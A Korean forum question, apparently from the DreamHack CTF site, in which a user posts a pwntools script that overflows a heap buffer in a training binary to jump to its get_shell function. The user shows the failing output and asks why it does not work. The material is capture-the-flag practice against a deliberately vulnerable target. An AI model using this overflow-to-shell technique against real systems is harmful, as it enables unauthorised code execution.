쉘코드를 짯는데도 안되네요..

from pwn import *

p = remote("host1.dreamhack.games",8446)
elf = ELF("./basic_heap_overflow")
get_shell = elf.symbols['get_shell']

p.sendline('A'*40 + p32(get_shell))

p.interactive()

------Ubuntu------
[+] Opening connection to host1.dreamhack.games on port 8446: Done
[] '/mnt/c/ctf/DreamHack/basic_heap_overflow/basic_heap_overflow'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[
] Switching to interactive mode
[] Got EOF while reading in interactive
$ cat flag
$ cat flag
[
] Closed connection to host1.dreamhack.games port 8446
[*] Got EOF while sending in interactive
왜일까요..?

#pwnable
작성자 정보
답변 0
질문에 대한 답을 알고 계신가요?
지식을 나누고 포인트를 획득해보세요.
답변하고 포인트 받기